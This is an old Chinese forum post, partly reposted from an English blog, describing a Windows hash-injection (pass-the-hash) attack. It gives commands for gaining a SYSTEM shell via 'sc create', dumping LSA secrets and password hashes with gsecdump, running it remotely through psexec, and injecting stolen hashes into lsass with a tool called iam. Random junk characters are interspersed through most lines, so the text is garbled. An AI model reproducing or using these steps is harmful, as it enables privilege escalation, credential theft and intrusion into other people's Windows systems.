找回密码
 立即注册
查看: 2554|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:
5 Z: e6 Y' A1 }* G# a  y) r. e  n
" K. F8 P: z; `7 bC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact- k/ }& _% I% k. C: }6 M3 f1 n
[SC] CreateService SUCCESS0 E% q* m  A8 Q4 N

0 }- i' y* N) ?0 i+ s6 g" OC:\>sc start shellcmdline
1 [/ r- j2 P) O8 f8 |7 n6 H# ~: a[SC] StartService FAILED 1053:
  }7 `* o$ \( `) E$ Z  s2 h; K  m
) X4 j0 C) e- `6 QThe service did not respond to the start or control request in a timely fashion.0 u8 e8 a' S2 R+ d) `  d, `4 ?4 V
- ^8 h" {1 y* ~8 o! V3 z5 ]
C:\>sc delete shellcmdline4 @: W; e; A# d( b/ F* H" R( g& k' m' Y
[SC] DeleteService SUCCESS2 g) }" P* u0 t6 ?# M$ e
6 p) r9 w  V5 o6 X2 @
------------
! |' m6 p  v- L% v0 b4 V  Y7 F8 ^3 v& G& c3 S0 k& z# h" ]5 V- J
Then in the new DOS window:
7 j1 H/ U6 i: ~( u3 \% h( K, {) y1 z! h$ n. q9 U
Microsoft Windows XP [Version 5.1.2600]
* c+ s3 X6 S( E$ D; q) c+ A(C) Copyright 1985-2001 Microsoft Corp.' x; y# d8 @1 F

$ e; A8 k2 a7 u, X: [  q' [; a+ J  IC:\WINDOWS\system32>whoami
$ v( b) _6 q- l! G+ F8 mNT AUTHORITY\SYSTEM
5 t+ k, D3 W5 `- c- {6 [" B
+ t  T" n& X* l4 FC:\WINDOWS\system32>gsecdump -h' I: e- U5 Y7 d, _4 E7 X
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se): C- g' P4 l3 B. `/ d9 C- E
usage: gsecdump [options]" {" @) z/ o' K6 X& \

1 @/ N+ A7 g- n8 h0 F$ o' A, j* Koptions:# H0 L" s( _: l1 a; v
-h [ --help ] show help
- f1 {# A' ]4 F' N: t2 ]) E* k% Z5 X-a [ --dump_all ] dump all secrets7 q$ U* l% B0 Z* ^  ~& n
-l [ --dump_lsa ] dump lsa secrets
8 }( [& ]3 A' w* Y-w [ --dump_wireless ] dump microsoft wireless connections
& U3 h  n' ~5 k. a-u [ --dump_usedhashes ] dump hashes from active logon sessions
$ H5 M! I) z% _% Q1 D- u) y-s [ --dump_hashes ] dump hashes from SAM/AD7 @4 {$ G' ~6 c4 x, ?& N) H

& u9 e9 v8 h  O: d, N2 f& ~9 {9 lAlthough I like to use:% R" f* i" Z5 `3 \$ [0 W: A

) |" d* A! N2 \PsExec v1.83 - Execute processes remotely7 n+ N/ m' x( z; r+ L! W* g1 P! T# e+ N
Copyright (C) 2001-2007 Mark Russinovich
$ z  Y/ K# L, P$ a2 d* V  [Sysinternals - 链接标记[url]www.sysinternals.com[/url]8 i  H3 _* g# I9 s& Y
5 T7 F& @& [: C4 z1 |! P9 t
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
0 k# b' B- B- S/ e* U  U5 ^1 I! F6 Q; T& Q" [' {1 c: s
to get the hashes from active logon sessions of a remote system.
9 x/ ]# j6 ^& H! q! F
# V$ v, \$ y& iThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.6 g. A, o- Q+ W$ W
3 c9 S: L- Q7 j+ M  r9 J9 R% b
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了./ J7 p6 H  ?8 F) v; G
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
; [4 Q& j5 u' [( P/ p) r) n  {$ X
3 c' x- a0 [) {" U" k8 b5 {+ y我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。% v+ q* H; j+ w- G  {( w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表